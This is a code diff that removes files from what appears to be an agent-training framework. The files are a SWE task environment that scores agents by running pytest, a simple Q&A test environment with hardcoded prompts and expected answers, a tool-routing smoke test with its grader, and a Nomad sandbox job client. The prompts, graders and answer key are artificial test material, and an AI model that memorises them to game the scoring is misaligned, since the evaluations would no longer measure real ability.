num_max_requests_at_once=1,
num_requests_for_eval=1,
timeout=int(os.getenv("ATROPOS_SERVER_TIMEOUT_S") or "300"),
),
]
return env_config, server_configs
async def setup_agent_env(self) -> None:
from datasets import load_dataset
t0 = time.perf_counter()
print(
f"[SweSmithOracleEnv] loading dataset {self.config.dataset_name}:{self.config.dataset_split} "
f"(python_only={self.config.python_only}, max_items={self.config.max_items or 'all'})",
flush=True,
)
ds = load_dataset(self.config.dataset_name, split=self.config.dataset_split)
self._dataset = ds
indices: List[int] = []
for idx in range(len(ds)):
row = ds[idx]
if self.config.python_only and not self._is_python_row(row):
continue
indices.append(idx)
if self.config.shuffle:
rnd = random.Random(self.config.seed)
rnd.shuffle(indices)
if self.config.max_items and self.config.max_items > 0:
indices = indices[: self.config.max_items]
self._indices = indices
self._cursor = 0
print(
f"[SweSmithOracleEnv] loaded {len(self._indices)} items from {self.config.dataset_name}:{self.config.dataset_split} "
f"in {time.perf_counter() - t0:.2f}s",
flush=True,
)
def _is_python_row(self, row: Dict[str, Any]) -> bool:
nodeids = row.get("PASS_TO_PASS")
if not isinstance(nodeids, list) or not nodeids:
return False
for nid in nodeids:
if not isinstance(nid, str) or ".py::" not in nid:
return False
return True
async def get_next_item(self) -> Item:
print(f"[SweSmithOracleEnv] get_next_item() cursor={self._cursor}/{len(self._indices)}", flush=True)
if not self._dataset or not self._indices:
raise RuntimeError("Dataset not initialized (did setup() run?)")
if self._cursor >= len(self._indices):
self._cursor = 0
idx = self._indices[self._cursor]
self._cursor += 1
return dict(self._dataset[idx])
def _repo_name(self, item: Item) -> str:
repo = item.get("repo") or ""
if isinstance(repo, str) and "/" in repo:
return repo.split("/")[-1]
return "repo"
def build_task(self, item: Item) -> str:
repo = item.get("repo") or ""
base_commit = item.get("base_commit") or ""
problem = str(item.get("problem_statement") or "")
context = str(item.get("text") or "")
nodeids = self._tests_for_item(item)
tests_list = "\n".join(f"- {t}" for t in nodeids)
repo_dir = self._repo_name(item)
tests_block = (
"Run these tests to verify:\n"
f"{tests_list}\n\n"
"When done, briefly describe what you changed and confirm tests pass."
)
prompt_mode = (self.config.prompt_mode or "problem_statement").strip().lower()
if prompt_mode not in {"problem_statement", "problem_statement+text"}:
raise ValueError(
f"Invalid prompt_mode={self.config.prompt_mode!r}. "
"Expected 'problem_statement' or 'problem_statement+text'."
)
context_block = ""
if prompt_mode == "problem_statement+text" and context:
# Note: We intentionally do NOT truncate/cap here. This mode is for debugging / richer prompts and can be slow.
context_block = f"\nAdditional context:\n{context}\n"
return (
"You are a senior software engineer. Fix the repository so the specified tests pass.\n\n"
f"Repository: {repo} (checked out at base_commit={base_commit})\n"
f"Workspace path: ./{repo_dir}\n\n"
"Constraints:\n"
"- You MUST use the terminal tool to inspect, edit, and verify the repository. Do not respond with a patch file.\n"
f"- Start by inspecting the repo (e.g. `ls`, `cd ./{repo_dir}`, `git status`).\n"
"- Use a workspace-local virtualenv (e.g. inside the repo at ./.venv) to avoid cross-run contamination.\n"
"- Use non-interactive commands only.\n\n"
"- Terminal commands run under POSIX /bin/sh and each tool call runs in a fresh shell (no persisted env vars).\n"
" Avoid bash-only `source`; prefer `. .venv/bin/activate` or `.venv/bin/python ...`.\n\n"
"Problem statement:\n"
f"{problem}\n\n"
f"{context_block}\n"
f"{tests_block}"
)
def build_agent_config(self, item: Item) -> AgentConfig: # noqa: ARG002
# SWE tasks are longer than the simple test env.
return AgentConfig(
max_steps=self.config.agent_max_steps,
temperature=self.config.agent_temperature,
max_tokens=self.config.agent_max_tokens,
tool_delay_s=self.config.agent_tool_delay_s,
)
async def setup_trajectory_workspace(self, item: Item, *, trajectory_id: str, exec_tool) -> Dict[str, Any]:
t0 = time.perf_counter()
repo = item.get("repo")
base_commit = item.get("base_commit")
instance_id = item.get("instance_id") or item.get("id") or item.get("problem_id")
if not isinstance(repo, str) or not isinstance(base_commit, str):
raise RuntimeError("Invalid dataset row: missing repo/base_commit")
repo_dir = self._repo_name(item)
clone_url = f"{self.config.repo_base_url.rstrip('/')}/{repo}.git"
print(
f"[SweSmithOracleEnv] tid={trajectory_id} setup_trajectory_workspace(): "
f"repo={repo} base_commit={base_commit} instance_id={instance_id} dir=./{repo_dir}",
flush=True,
)
# Repo setup strategy:
# - Maintain a shared, per-container bare repo cache under /data/repo_cache
# - For each trajectory, create an isolated git worktree under the slot workspace
# This avoids cloning/fetching full repos per trajectory and is crucial for multiplexing.
def _repo_cache_slug(repo_name: str) -> str:
return repo_name.replace("/", "__")
repo_slug = _repo_cache_slug(repo)
cache_root = "/data/repo_cache"
bare_repo = f"{cache_root}/{repo_slug}.git"
lock_file = f"{cache_root}/.locks/{repo_slug}.lock"
# Use flock to serialize operations that mutate the shared bare repo (fetch/worktree).
# util-linux (flock) is included in the sandbox image.
worktree_cmd = (
"set -e; "
f"rm -rf {repo_dir}; "
f"mkdir -p {cache_root}/.locks; "
f": > {lock_file}; "
f"flock -x {lock_file} sh -lc '"
f"set -e; "
"export GIT_TERMINAL_PROMPT=0; "
"export GIT_LFS_SKIP_SMUDGE=1; "
f"if [ ! -d \"{bare_repo}\" ]; then "
f" git init --bare \"{bare_repo}\"; "
f" git -C \"{bare_repo}\" remote add origin \"{clone_url}\"; "
"fi; "
f"git -C \"{bare_repo}\" remote set-url origin \"{clone_url}\"; "
f"git -C \"{bare_repo}\" worktree prune || true; "
f"if ! git -C \"{bare_repo}\" cat-file -e \"{base_commit}^{{commit}}\" 2>/dev/null; then "
f" git -C \"{bare_repo}\" fetch --depth 1 origin \"{base_commit}\" || true; "
"fi; "
f"if ! git -C \"{bare_repo}\" cat-file -e \"{base_commit}^{{commit}}\" 2>/dev/null; then "
f" git -C \"{bare_repo}\" fetch --prune origin; "
"fi; "
f"git --git-dir=\"{bare_repo}\" worktree add --detach \"{repo_dir}\" \"{base_commit}\"; "
"'"
)
print(f"[SweSmithOracleEnv] tid={trajectory_id} preparing worktree from repo cache", flush=True)
res = await exec_tool(
ToolCall(
name="terminal",
arguments={"command": worktree_cmd, "timeout": self.config.install_timeout_s},
)
)
if not res.success:
raise RuntimeError(
"git worktree setup failed "
f"(repo={repo}, base_commit={base_commit}, instance_id={instance_id}): {res.error}\n{res.output}"
)
print(
f"[SweSmithOracleEnv] tid={trajectory_id} setup_trajectory_workspace(): worktree ready in {time.perf_counter() - t0:.2f}s",
flush=True,
)
return {"repo_dir": repo_dir, "base_commit": base_commit}
def _tests_for_item(self, item: Item) -> List[str]:
tests: List[str] = []
if self.config.score_include_fail_to_pass:
for key in ("PASS_TO_PASS", "FAIL_TO_PASS"):
nodeids = item.get(key)
if isinstance(nodeids, list):
tests.extend([n for n in nodeids if isinstance(n, str)])
else:
nodeids = item.get("PASS_TO_PASS")
if isinstance(nodeids, list):
tests.extend([n for n in nodeids if isinstance(n, str)])
# Stable order for reproducibility.
return sorted(dict.fromkeys(tests))
def _chunk_nodeids(self, nodeids: List[str], max_per_chunk: int = 50) -> List[List[str]]:
chunks: List[List[str]] = []
for i in range(0, len(nodeids), max_per_chunk):
chunks.append(nodeids[i : i + max_per_chunk])
return chunks
async def verify_and_score_trajectory(
self,
item: Item,
final_response: str, # noqa: ARG002
*,
trajectory_id: str,
exec_tool,
agent_result=None,
workspace_meta: Optional[Dict[str, Any]] = None,
) -> tuple[float, Dict[str, Any]]:
_ = trajectory_id
repo_dir = self._repo_name(item)
# Training correctness: do not reward trajectories that never actually used tools.
if agent_result is not None and getattr(agent_result, "total_tool_calls", 0) <= 0:
print(
f"[SweSmithOracleEnv] tid={trajectory_id} verify (dataset_tests): no tool calls; score=0.0",
flush=True,
)
return 0.0, {
"verification_mode": "dataset_tests",
"error": "No tool calls were made by the agent",
}
nodeids = self._tests_for_item(item)
if not nodeids:
return 0.0, {"error": "No tests provided"}
print(f"[SweSmithOracleEnv] tid={trajectory_id} verify (dataset_tests): ensuring venv + deps", flush=True)
setup_cmd = (
f"cd {repo_dir} && "
"python -m venv .venv && "
". .venv/bin/activate && "
"python -m pip install -U pip setuptools wheel && "
"python -m pip install -e . && "
"python -m pip install pytest"
)
setup_res = await exec_tool(
ToolCall(name="terminal", arguments={"command": setup_cmd, "timeout": self.config.install_timeout_s})
)
verification_messages = [{"role": "user", "content": setup_res.to_xml()}]
if not setup_res.success:
return 0.0, {
"verification_mode": "dataset_tests",
"phase": "install",
"error": setup_res.error,
"output": setup_res.output,
"verification_messages": verification_messages,
}
chunks = self._chunk_nodeids(nodeids, max_per_chunk=50)
for chunk_idx, chunk in enumerate(chunks):
joined = " ".join(chunk)
cmd = f"cd {repo_dir} && . .venv/bin/activate && python -m pytest -q {joined}"
res = await exec_tool(
ToolCall(
name="terminal",
arguments={"command": cmd, "timeout": self.config.test_timeout_s},
)
)
verification_messages.append({"role": "user", "content": res.to_xml()})
if not res.success:
return 0.0, {
"verification_mode": "dataset_tests",
"phase": "pytest",
"failed_chunk": chunk_idx,
"error": res.error,
"output": res.output,
"verification_messages": verification_messages,
}
return 1.0, {"verification_mode": "dataset_tests", "passed": True, "verification_messages": verification_messages}
async def score_trajectory(self, item: Item, final_response: str) -> float:
# Not used; scoring happens in verify_and_score_trajectory.
_ = (item, final_response)
return 0.0
if __name__ == "__main__":
SweSmithOracleEnv.cli()

View File

@@ -1,217 +0,0 @@
"""
Simple test environment for validating the atropos-agent setup.
This environment uses a local OpenAI-compatible server for LLM testing to verify:
- BaseEnv extension works correctly
- API communication via OpenAI-compatible endpoint
- Basic trajectory collection
This is a minimal environment for testing, not production use.
"""
import os
from typing import Dict, List, Optional, Tuple
from dotenv import load_dotenv
from pydantic import Field
from atroposlib.envs.base import (
APIServerConfig,
Item,
)
from ..agent import AgentConfig
from .agent_env import AgentEnv, AgentEnvConfig
# Load environment variables from .env file
load_dotenv()
# Simple test prompts for validation
TEST_PROMPTS = [
{
"prompt": "What is 2 + 2? Answer with just the number.",
"expected": "4",
},
{
"prompt": "What is the capital of France? Answer with just the city name.",
"expected": "Paris",
},
{
"prompt": "What color is the sky on a clear day? Answer with just the color.",
"expected": "Blue",
},
{
"prompt": "How many days are in a week? Answer with just the number.",
"expected": "7",
},
{
"prompt": "What is 10 * 5? Answer with just the number.",
"expected": "50",
},
]
SYSTEM_PROMPT = (
"You are a helpful assistant. Answer questions concisely and directly. "
"When asked for a simple answer, provide just that answer without explanation."
)
class SimpleTestEnvConfig(AgentEnvConfig):
"""Configuration for the simple test environment."""
server_base_url: str = Field(
default="http://127.0.0.1:8080",
description="Base URL for an OpenAI-compatible server (without /v1)",
)
server_model: str = Field(
default="hermes-4-36b",
description="Model name",
)
tokenizer_name: str = Field(default="NousResearch/Hermes-4.3-36B", description="Tokenizer name for RL tokenization")
class SimpleTestEnv(AgentEnv[SimpleTestEnvConfig]):
"""
A simple test environment to validate the atropos-agent setup.
Uses a local OpenAI-compatible LLM endpoint with basic question-answering tasks.
Scoring is based on whether the response contains the expected answer.
"""
name = "simple_test_env"
env_config_cls = SimpleTestEnvConfig
def __init__(
self,
config: SimpleTestEnvConfig,
server_configs: List[APIServerConfig],
slurm: bool = False,
testing: bool = False,
):
super().__init__(config, server_configs, slurm, testing)
self.iter = 0
self.test_prompts = TEST_PROMPTS
self.percent_correct_buffer: List[float] = []
@classmethod
def config_init(cls) -> Tuple[SimpleTestEnvConfig, List[APIServerConfig]]:
"""
Initialize configuration with local server settings from environment variables.
"""
base_url = (
os.getenv("ATROPOS_SERVER_BASE_URL")
or os.getenv("OPENAI_BASE_URL")
or os.getenv("LLM_BASE_URL")
or "http://127.0.0.1:8080"
)
model = os.getenv("ATROPOS_SERVER_MODEL") or os.getenv("LLM_MODEL") or "hermes-4-36b"
api_key = os.getenv("ATROPOS_SERVER_API_KEY") or os.getenv("NOUS_API_KEY") or os.getenv("OPENAI_API_KEY") or "local"
env_config = SimpleTestEnvConfig(
tokenizer_name=os.getenv("ATROPOS_TOKENIZER_NAME") or "NousResearch/Hermes-4.3-36B",
group_size=4,
use_wandb=False, # Disable wandb for simple testing
rollout_server_url="http://localhost:8000",
total_steps=10,
batch_size=16,
steps_per_eval=5,
max_token_length=2048,
inference_weight=1.0,
wandb_name="simple_test",
server_base_url=base_url,
server_model=model,
)
# OpenAI-compatible servers typically expose chat completions at /v1.
server_configs = [
APIServerConfig(
model_name=model,
base_url=f"{base_url}/v1",
api_key=api_key,
num_max_requests_at_once=4,
num_requests_for_eval=8,
timeout=120, # Local models may be slower
),
]
return env_config, server_configs
async def setup_agent_env(self):
"""Setup the environment - load test data."""
print(f"SimpleTestEnv setup complete. {len(self.test_prompts)} test prompts loaded.")
print(f"Using server at: {self.config.server_base_url}")
print(f"Model: {self.config.server_model}")
async def get_next_item(self) -> Item:
"""Get the next test prompt."""
item = self.test_prompts[self.iter % len(self.test_prompts)]
self.iter += 1
return item
def build_task(self, item: Item) -> str:
return item["prompt"]
def build_agent_config(self, item: Item) -> AgentConfig: # noqa: ARG002
return AgentConfig(
max_steps=5,
temperature=0.7,
max_tokens=256,
system_prompt=SYSTEM_PROMPT,
)
async def score_trajectory(self, item: Item, final_response: str) -> float:
expected = item["expected"].lower()
response_lower = (final_response or "").lower()
score = 1.0 if expected in response_lower else 0.0
self.percent_correct_buffer.append(score)
return score
async def evaluate(self, *args, **kwargs):
"""
Simple evaluation - run through all test prompts once.
"""
correct = 0
total = len(self.test_prompts)
for item in self.test_prompts:
messages = [
{"role": "system", "content": SYSTEM_PROMPT},
{"role": "user", "content": item["prompt"]},
]
response = await self.server.chat_completion(
messages=messages,
n=1,
max_tokens=256,
temperature=0.0, # Greedy for eval
split="eval",
)
response_text = response.choices[0].message.content or ""
expected = item["expected"].lower()
if expected in response_text.lower():
correct += 1
accuracy = correct / total
print(f"Evaluation: {correct}/{total} = {accuracy:.2%} accuracy")
return {"eval_accuracy": accuracy}
async def wandb_log(self, wandb_metrics: Optional[Dict] = None):
"""Log metrics (simplified for testing)."""
if wandb_metrics is None:
wandb_metrics = {}
if self.percent_correct_buffer:
avg_correct = sum(self.percent_correct_buffer) / len(self.percent_correct_buffer)
wandb_metrics["train/percent_correct"] = avg_correct
print(f"Train accuracy: {avg_correct:.2%}")
self.percent_correct_buffer = []
await super().wandb_log(wandb_metrics)
if __name__ == "__main__":
# Allow running as CLI
SimpleTestEnv.cli()

View File

@@ -1,165 +0,0 @@
"""
ToolServer routing smoke environment.
Validates that:
- sandbox tools run through Nomad SlotPool (terminal -> bash in sandbox)
- external tools run through ToolServer (skills_list)
This env uses ToolServer in-process by default (`tool_server_url="inprocess"`),
so it is self-contained for local testing.
Run:
uv run python -m atropos.envs.toolserver_smoke_env process --env.use_wandb false --env.total_steps 1 --env.group_size 1
"""
from __future__ import annotations
import os
from typing import Any, Dict, List, Tuple
from dotenv import load_dotenv
from pydantic import Field
from atroposlib.envs.base import APIServerConfig, Item
from ..agent import AgentConfig, AgentResult
from .agent_env import AgentEnv, AgentEnvConfig
load_dotenv()
class ToolServerSmokeEnvConfig(AgentEnvConfig):
server_base_url: str = Field(
default="http://127.0.0.1:8080",
description="Base URL for an OpenAI-compatible chat server (without /v1).",
)
server_model: str = Field(default="hermes-4-36b", description="Model name")
tokenizer_name: str = Field(default="NousResearch/Hermes-4.3-36B", description="Tokenizer name for RL tokenization")
class ToolServerSmokeEnv(AgentEnv[ToolServerSmokeEnvConfig]):
name = "toolserver_smoke_env"
env_config_cls = ToolServerSmokeEnvConfig
def __init__(
self,
config: ToolServerSmokeEnvConfig,
server_configs: List[APIServerConfig],
slurm: bool = False,
testing: bool = False,
):
super().__init__(config, server_configs, slurm, testing)
self._iter = 0
@classmethod
def config_init(cls) -> Tuple[ToolServerSmokeEnvConfig, List[APIServerConfig]]:
base_url = (
os.getenv("ATROPOS_SERVER_BASE_URL")
or os.getenv("OPENAI_BASE_URL")
or os.getenv("LLM_BASE_URL")
or "http://127.0.0.1:8080"
)
model = os.getenv("ATROPOS_SERVER_MODEL") or os.getenv("LLM_MODEL") or "hermes-4-36b"
api_key = os.getenv("ATROPOS_SERVER_API_KEY") or os.getenv("NOUS_API_KEY") or os.getenv("OPENAI_API_KEY") or "local"
env_config = ToolServerSmokeEnvConfig(
tokenizer_name=os.getenv("ATROPOS_TOKENIZER_NAME") or "NousResearch/Hermes-4.3-36B",
group_size=1,
use_wandb=False,
include_messages=True,
ensure_scores_are_not_same=False,
total_steps=1,
batch_size=1,
server_base_url=base_url,
server_model=model,
enabled_toolsets=["terminal", "skills"],
disabled_toolsets=[],
# Self-contained ToolServer for local smoke.
tool_server_url="inprocess",
sandbox_image=os.getenv("ATROPOS_SANDBOX_IMAGE") or "atropos-sandbox:local",
purge_job_on_start=True,
purge_job_on_shutdown=True,
)
server_configs = [
APIServerConfig(
model_name=model,
base_url=f"{base_url.rstrip('/')}/v1",
api_key=api_key,
num_max_requests_at_once=1,
num_requests_for_eval=1,
timeout=120,
)
]
return env_config, server_configs
async def setup_agent_env(self) -> None:
return None
async def get_next_item(self) -> Item:
self._iter += 1
return {
"prompt": (
"You MUST call exactly one tool per assistant message.\n"
"\n"
"Step 1) Call the skills_list tool (no arguments), then stop.\n"
"Step 2) After you receive the tool response, call the terminal tool to run:\n"
"python -c \"print('ok')\"\n"
"Step 3) After you receive the terminal tool response, answer with just: ok\n"
"\n"
"Tool call format requirements:\n"
"- Every tool call MUST be a complete XML block with a closing tag.\n"
"- Do NOT emit a second <tool_call> in the same assistant message.\n"
"\n"
"Example:\n"
"<tool_call>{\"name\": \"skills_list\", \"arguments\": {}}</tool_call>\n"
"Do not include anything else in your final answer."
)
}
def build_task(self, item: Item) -> str:
return str(item.get("prompt") or "")
def build_agent_config(self, item: Item) -> AgentConfig: # noqa: ARG002
return AgentConfig(
max_steps=min(10, int(self.config.agent_max_steps)),
temperature=0.2,
max_tokens=None,
)
async def score_trajectory(self, item: Item, final_response: str) -> float:
_ = (item, final_response)
return 0.0
async def verify_and_score_trajectory(
self,
item: Item,
final_response: str,
*,
trajectory_id: str, # noqa: ARG002
exec_tool, # noqa: ARG002
agent_result: AgentResult | None = None,
workspace_meta: Dict[str, Any] | None = None, # noqa: ARG002
) -> tuple[float, Dict[str, Any]]:
if agent_result is None:
return 0.0, {"error": "Missing agent_result"}
called = {c.name for s in agent_result.steps for c in s.tool_calls}
need = {"skills_list", "terminal"}
if not need.issubset(called):
return 0.0, {"error": f"Missing tool calls: {sorted(need - called)}", "called": sorted(called)}
terminal_ok = False
for step in agent_result.steps:
for call, res in zip(step.tool_calls, step.tool_results):
if call.name != "terminal":
continue
if res.success and (res.output or "").strip().splitlines()[-1].strip() == "ok":
terminal_ok = True
score = 1.0 if terminal_ok and (final_response or "").strip() == "ok" else 0.0
return score, {"called": sorted(called), "final": (final_response or "").strip()}
if __name__ == "__main__":
ToolServerSmokeEnv.cli()

View File

@@ -1,11 +0,0 @@
"""
Nomad integration for atropos-agent.
Provides:
- NomadClient: Client for Nomad HTTP API
- Job templates for sandbox containers
"""
from .client import NomadClient
__all__ = ["NomadClient"]

View File

@@ -1,500 +0,0 @@
"""
Nomad API Client for atropos-agent.
Provides a simple async client for interacting with the Nomad HTTP API:
- Submit/stop jobs
- Query allocations
- Get allocation addresses
- Scale jobs up/down
"""
import asyncio
import json
import os
from dataclasses import dataclass, field
from enum import Enum
from pathlib import Path
from typing import Any, Dict, List, Optional
import aiohttp
class AllocationStatus(Enum):
"""Nomad allocation status."""
PENDING = "pending"
RUNNING = "running"
COMPLETE = "complete"
FAILED = "failed"
LOST = "lost"
@dataclass
class Allocation:
"""Information about a Nomad allocation."""
id: str
job_id: str
task_group: str
node_id: str
status: AllocationStatus
# Network info for reaching the allocation
address: Optional[str] = None
port: Optional[int] = None
@property
def http_address(self) -> Optional[str]:
"""Get full HTTP address for the allocation."""
if self.address and self.port:
return f"http://{self.address}:{self.port}"
return None
@dataclass
class JobStatus:
"""Status of a Nomad job."""
id: str
name: str
status: str
allocations: List[Allocation] = field(default_factory=list)
count: int = 0 # Number of task groups
class NomadClient:
"""
Async client for Nomad HTTP API.
Usage:
client = NomadClient(address="http://localhost:4646")
# Submit a job
await client.submit_job(job_spec)
# Get allocations
allocs = await client.get_job_allocations("sandbox-python")
# Scale job
await client.scale_job("sandbox-python", count=5)
"""
def __init__(
self,
address: str = "http://localhost:4646",
token: Optional[str] = None,
timeout: float = 30.0,
):
self.address = address.rstrip("/")
self.token = token or os.environ.get("NOMAD_TOKEN")
self.timeout = aiohttp.ClientTimeout(total=timeout)
self._session: Optional[aiohttp.ClientSession] = None
async def _get_session(self) -> aiohttp.ClientSession:
"""Get or create HTTP session."""
if self._session is None or self._session.closed:
headers = {}
if self.token:
headers["X-Nomad-Token"] = self.token
self._session = aiohttp.ClientSession(
timeout=self.timeout,
headers=headers,
)
return self._session
async def close(self):
"""Close the HTTP session."""
if self._session and not self._session.closed:
await self._session.close()
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
await self.close()
async def _request(
self,
method: str,
path: str,
data: Optional[Dict[str, Any]] = None,
) -> Dict[str, Any]:
"""Make an HTTP request to Nomad API."""
session = await self._get_session()
url = f"{self.address}{path}"
try:
async with session.request(method, url, json=data) as response:
if response.status == 404:
return {"error": "not_found", "status": 404}
text = await response.text()
if not text:
return {"status": response.status}
try:
result = json.loads(text)
except json.JSONDecodeError:
return {"text": text, "status": response.status}
if response.status >= 400:
return {"error": result, "status": response.status}
return result if isinstance(result, dict) else {"data": result, "status": response.status}
except aiohttp.ClientError as e:
return {"error": str(e), "status": 0}
# Job Operations
async def submit_job(self, job_spec: Dict[str, Any]) -> Dict[str, Any]:
"""
Submit a job to Nomad.
Args:
job_spec: Job specification dict (HCL converted to JSON)
Returns:
Response with EvalID if successful
"""
return await self._request("POST", "/v1/jobs", {"Job": job_spec})
async def stop_job(self, job_id: str, purge: bool = False) -> Dict[str, Any]:
"""
Stop (and optionally purge) a job.
Args:
job_id: Job identifier
purge: If True, completely remove the job
"""
path = f"/v1/job/{job_id}"
if purge:
path += "?purge=true"
return await self._request("DELETE", path)
async def get_job(self, job_id: str) -> Optional[Dict[str, Any]]:
"""Get job details."""
result = await self._request("GET", f"/v1/job/{job_id}")
if "error" in result and result.get("status") == 404:
return None
return result
async def get_job_status(self, job_id: str) -> Optional[JobStatus]:
"""Get job status with allocations."""
job = await self.get_job(job_id)
if not job:
return None
allocs = await self.get_job_allocations(job_id)
# Get count from task groups
count = 0
task_groups = job.get("TaskGroups", [])
for tg in task_groups:
count += tg.get("Count", 1)
return JobStatus(
id=job_id,
name=job.get("Name", job_id),
status=job.get("Status", "unknown"),
allocations=allocs,
count=count,
)
# Allocation Operations
async def get_job_allocations(self, job_id: str) -> List[Allocation]:
"""Get all allocations for a job."""
result = await self._request("GET", f"/v1/job/{job_id}/allocations")
if "error" in result:
return []
allocs_data = result.get("data", result) if isinstance(result, dict) else result
if not isinstance(allocs_data, list):
return []
allocations = []
for alloc_data in allocs_data:
# Parse allocation info
alloc_id = alloc_data.get("ID", "")
status_str = alloc_data.get("ClientStatus", "unknown")
try:
status = AllocationStatus(status_str)
except ValueError:
status = AllocationStatus.PENDING
# Get network info - need to fetch detailed allocation for this
address = None
port = None
# First try the summary data
resources = alloc_data.get("AllocatedResources") or {}
shared = resources.get("Shared") or {}
networks = shared.get("Networks") or []
# If no networks in summary, fetch detailed allocation
if not networks and alloc_id:
detailed = await self.get_allocation(alloc_id)
if detailed:
resources = detailed.get("AllocatedResources") or {}
shared = resources.get("Shared") or {}
networks = shared.get("Networks") or []
if networks:
network = networks[0]
address = network.get("IP")
# Look for dynamic ports OR reserved ports (Singularity/raw_exec uses reserved)
dyn_ports = network.get("DynamicPorts") or []
reserved_ports = network.get("ReservedPorts") or []
for dp in dyn_ports + reserved_ports:
if dp.get("Label") == "http":
port = dp.get("Value")
break
allocations.append(Allocation(
id=alloc_id,
job_id=job_id,
task_group=alloc_data.get("TaskGroup", ""),
node_id=alloc_data.get("NodeID", ""),
status=status,
address=address,
port=port,
))
return allocations
async def get_allocation(self, alloc_id: str) -> Optional[Dict[str, Any]]:
"""Get detailed allocation info."""
result = await self._request("GET", f"/v1/allocation/{alloc_id}")
if "error" in result and result.get("status") == 404:
return None
return result
# Scaling Operations
async def scale_job(self, job_id: str, count: int, task_group: str = "sandbox") -> Dict[str, Any]:
"""
Scale a job's task group to specified count.
Args:
job_id: Job identifier
count: Desired number of allocations
task_group: Name of task group to scale
"""
payload = {
"Count": count,
"Target": {
"Group": task_group,
},
}
return await self._request("POST", f"/v1/job/{job_id}/scale", payload)
async def get_job_scale_status(self, job_id: str) -> Dict[str, int]:
"""
Get current scale status for a job.
Returns:
Dict mapping task group name to count
"""
result = await self._request("GET", f"/v1/job/{job_id}/scale")
if "error" in result:
return {}
task_groups = result.get("TaskGroups", {})
return {
name: info.get("Running", 0)
for name, info in task_groups.items()
}
# Health Check
async def is_healthy(self) -> bool:
"""Check if Nomad is reachable and healthy."""
try:
result = await self._request("GET", "/v1/status/leader")
return "error" not in result
except Exception:
return False
async def get_leader(self) -> Optional[str]:
"""Get current Nomad leader address."""
result = await self._request("GET", "/v1/status/leader")
if isinstance(result, dict) and "data" in result:
return result["data"]
return None
def load_job_template(
template_name: str = "sandbox",
**kwargs,
) -> Dict[str, Any]:
"""
Load and configure a job template.
Args:
template_name: Name of template (e.g., "sandbox")
**kwargs: Template variables to substitute
Returns:
Job specification dict ready for Nomad API
"""
# Default job template for sandbox container
if template_name == "sandbox":
return create_sandbox_job(**kwargs)
else:
raise ValueError(f"Unknown template: {template_name}")
def create_sandbox_job(
job_id: str = "atropos-sandbox",
image: str = "atropos-sandbox:local", # Use :local tag to avoid registry pull
count: int = 1,
slots_per_container: int = 10,
privileged: bool = False,
cpu: int = 500,
memory: int = 512,
port: int = 8080,
datacenter: str = "dc1",
driver: str = "docker", # "docker" or "singularity"
singularity_image: str = None, # Path to .sif file for singularity driver
) -> Dict[str, Any]:
"""
Create a sandbox job specification.
This job runs the sandbox_server.py inside a container,
with the specified number of slots for agent workspaces.
Args:
job_id: Unique job identifier
image: Docker image to use (for docker driver)
count: Number of container instances
slots_per_container: Number of slots per container
privileged: Run container in privileged mode (recommended for bubblewrap)
cpu: CPU allocation in MHz
memory: Memory allocation in MB
port: HTTP port for sandbox server
datacenter: Nomad datacenter
driver: Container driver - "docker" or "singularity"
singularity_image: Path to .sif file (required if driver="singularity")
Returns:
Job specification dict
"""
# Build task config based on driver
if driver == "singularity":
if not singularity_image:
raise ValueError("singularity_image path required when driver='singularity'")
# Use raw_exec driver to run apptainer via shell for variable expansion
# The container binds the allocation directory for workspace persistence
# For raw_exec, we use static port since Nomad's dynamic port mapping doesn't
# work the same as Docker - the process runs directly on the host.
shell_cmd = (
f'apptainer run '
f'--bind "$NOMAD_ALLOC_DIR/data:/data" '
f'--pwd /app '
f'--env PYTHONUNBUFFERED=1 '
f'{singularity_image} '
f'python sandbox_server.py '
f'--port {port} '
f'--slots {slots_per_container} '
f'--data-dir /data'
)
task_config = {
"command": "/bin/sh",
"args": ["-c", shell_cmd],
}
task_driver = "raw_exec"
else:
# Docker driver (default)
task_config = {
"image": image,
"force_pull": False, # Use local image, don't try to pull
"ports": ["http"],
"privileged": privileged,
"command": "python",
"args": [
"sandbox_server.py",
"--port", str(port),
"--slots", str(slots_per_container),
"--data-dir", "/data",
],
# Note: On Linux, you can mount persistent storage:
# "volumes": ["${NOMAD_ALLOC_DIR}/data:/data"],
# On macOS/Docker Desktop, skip volumes for PoC
# (container /data is ephemeral but works for testing)
}
task_driver = "docker"
# For Singularity/raw_exec, use static ports since the process runs directly on host.
# For Docker, use dynamic ports with port mapping.
if driver == "singularity":
network_config = {
"Mode": "host",
"ReservedPorts": [
{
"Label": "http",
"Value": port,
}
],
}
else:
network_config = {
"Mode": "host",
"DynamicPorts": [
{
"Label": "http",
"To": port,
}
],
}
return {
"ID": job_id,
"Name": job_id,
"Type": "service",
"Datacenters": [datacenter],
"TaskGroups": [
{
"Name": "sandbox",
"Count": count,
# Speed up deployments and avoid Consul checks. Without this, Nomad may
# keep an "active deployment" around for the default MinHealthyTime,
# which blocks immediate scaling under load.
"Update": {
"HealthCheck": "task_states",
"MinHealthyTime": 0,
},
"Networks": [network_config],
"Tasks": [
{
"Name": "sandbox-server",
"Driver": task_driver,
"Config": task_config,
"Env": {
"PYTHONUNBUFFERED": "1",
"NOMAD_ALLOC_DIR": "${NOMAD_ALLOC_DIR}",
},
"Resources": {
"CPU": cpu,
"MemoryMB": memory,
},
# Note: Services with Checks require Consul, which we skip for the PoC
}
],
"RestartPolicy": {
"Attempts": 3,
"Interval": 300_000_000_000, # 5 minutes
"Delay": 10_000_000_000, # 10 seconds
"Mode": "delay",
},
"ReschedulePolicy": {
"Attempts": 5,
"Interval": 3600_000_000_000, # 1 hour
"Delay": 30_000_000_000, # 30 seconds
"DelayFunction": "exponential",
"MaxDelay": 300_000_000_000, # 5 minutes
"Unlimited": False,
},
}
],
}

File diff suppressed because it is too large Load Diff

View File

@@ -1,20 +0,0 @@
"""
Slot-based multiplexing for atropos-agent.
Provides:
- Slot: Isolated workspace for a single trajectory
- SlotPool: Manages slots across Nomad allocations
- SandboxExecutor: Executes tools in sandbox containers
"""
from .executor import SandboxExecutor
from .pool import SlotPool, SlotPoolConfig
from .slot import Slot, SlotState
__all__ = [
"Slot",
"SlotState",
"SlotPool",
"SlotPoolConfig",
"SandboxExecutor",
]

View File

@@ -1,457 +0,0 @@
"""
SandboxExecutor - HTTP client for sandbox container communication.
Sends tool execution requests to sandbox_server.py running inside Nomad containers.
Supports single and batch execution for efficiency.
"""
import asyncio
import uuid
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional, Tuple
import aiohttp
from .slot import Slot, SlotState
